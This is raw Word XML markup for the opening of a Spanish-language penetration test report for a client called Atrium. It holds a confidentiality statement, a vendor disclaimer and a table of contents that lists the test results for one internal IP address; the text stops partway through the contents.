          <w:divId w:val="198251480"/>
          <w:trHeight w:val="700"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1836" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="191C24"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B626454" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="tableparagraph"/>
              <w:spacing w:before="221" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="284" w:right="461"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CLIENTE:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7844"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28AFAEA1" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="tableparagraph"/>
              <w:spacing w:before="5" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="284" w:right="461"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76CB0E3B" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="tableparagraph"/>
              <w:spacing w:before="1" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="284" w:right="461"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Atrium</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:b/>
                <w:bCs/>
                <w:spacing w:val="-1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51914EA6" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8320DA" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17903047" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1198C88C" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">DECLARACIÓN DE CONFIDENCIALIDAD </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D52518B" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0EFB31" w14:textId="4F854EFB" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este informe contiene la información relativa a las posibles brechas de seguridad de Atrium y sus sistemas. </w:t>
      </w:r>
      <w:r w:rsidR="006A21C9">
        <w:t>Se</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> recomienda que sean tomadas precauciones especiales para proteger la confidencialidad de este documento y de la información contenida en él. Todas las demás copias del informe se han entregado a Atrium. La evaluación de la seguridad es un proceso incierto, basado en las experiencias, la información actualmente disponible y las amenazas conocidas. Se debe entender que todos los sistemas de información, por su naturaleza dependen de los seres humanos y son vulnerables en cierto grado. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC75B65" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="8" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0A0E4D" w14:textId="6B67A64E" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este informe podrá recomendar que Atrium utilice ciertos productos de software o hardware fabricados o mantenidas por otros proveedores. </w:t>
      </w:r>
      <w:r w:rsidR="006A21C9">
        <w:t>Se</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> basa</w:t>
      </w:r>
      <w:r w:rsidR="006A21C9">
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> estas recomendaciones a partir de su experiencia previa con las capacidades de estos productos. Sin embargo,</w:t>
      </w:r>
      <w:r w:rsidR="006A21C9">
        <w:t xml:space="preserve"> no se </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">puede y no debe garantizar que un determinado producto funcionará según lo anunciado por el vendedor. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED38D4C" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="8" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E0509C" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="593710340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C814CC3" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="593710340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276A9162" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:divId w:val="593710340"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ÍNDICE </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E582D73" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="593710340"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:id w:val="-110667353"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="7AF32467" w14:textId="5992B832" w:rsidR="002C5736" w:rsidRDefault="002C5736">
          <w:pPr>
            <w:pStyle w:val="TtuloTDC"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="0A668C98" w14:textId="0BF6B94A" w:rsidR="002C5736" w:rsidRDefault="002C5736">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc200831432" w:history="1">
            <w:r w:rsidRPr="00070C16">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1 INTRODUCCIÓN</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc200831432 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B2C50A1" w14:textId="0CB6C1B8" w:rsidR="002C5736" w:rsidRDefault="002C5736">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc200831433" w:history="1">
            <w:r w:rsidRPr="00070C16">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1 OBJETIVO</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc200831433 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E1DE6D1" w14:textId="5A1352B8" w:rsidR="002C5736" w:rsidRDefault="002C5736">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc200831434" w:history="1">
            <w:r w:rsidRPr="00070C16">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2 ALCANCE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc200831434 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C2C877D" w14:textId="24BE9BCC" w:rsidR="002C5736" w:rsidRDefault="002C5736">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc200831435" w:history="1">
            <w:r w:rsidRPr="00070C16">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2 RESUMEN EJECUTIVO</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc200831435 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="43569CA7" w14:textId="21E19A1C" w:rsidR="002C5736" w:rsidRDefault="002C5736">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc200831436" w:history="1">
            <w:r w:rsidRPr="00070C16">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3 RESULTADO DE LAS PRUEBAS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc200831436 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6CC48F21" w14:textId="0199474A" w:rsidR="002C5736" w:rsidRDefault="002C5736">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc200831437" w:history="1">
            <w:r w:rsidRPr="00070C16">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1 Detalles de los objetivos</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc200831437 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4BB3C45F" w14:textId="5FFFEAC3" w:rsidR="002C5736" w:rsidRDefault="002C5736">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc200831438" w:history="1">
            <w:r w:rsidRPr="00070C16">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>192.168.1.141</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc200831438 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4A815331" w14:textId="22F0ADA7" w:rsidR="002C5736" w:rsidRDefault="002C5736">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc200831439" w:history="1">
            <w:r w:rsidRPr="00070C16">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4 Tabla de criticidad</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc200831439 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E61611B" w14:textId="479D0FDE" w:rsidR="002C5736" w:rsidRDefault="002C5736">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc200831440" w:history="1">
            <w:r w:rsidRPr="00070C16">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>192.168.1.141</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc200831440 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="58D72EA3" w14:textId="305C953E" w:rsidR="002C5736" w:rsidRDefault="002C5736">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc200831441" w:history="1">
            <w:r w:rsidRPr="00070C16">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5 Conclusiones</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
